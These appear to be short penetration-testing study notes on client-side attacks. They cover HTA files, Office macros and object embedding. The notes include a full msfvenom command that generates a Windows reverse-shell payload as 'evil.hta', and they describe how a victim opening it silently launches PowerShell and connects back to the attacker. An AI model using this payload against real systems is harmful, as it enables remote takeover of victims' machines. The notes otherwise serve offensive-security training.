Require client interaction for client software to execute malicious code. ## Know Your Target ### Passive Client Information Gathering ## HTA Attack Generate html file ```bash sudo msfvenom -p windows/shell_reverse_tcp LHOST=<hacker ip> LPORT=<PORT> -f hta-psh -o /var/www/html/evil.hta ``` When client open this html and click allow, powershell on victim's machine is launched silently and a reverse shell will be sent back to attacker. ## Exploiting Microsoft Office Use macro to execute powershell code to create a rever shell. ## Object Linking and Embedding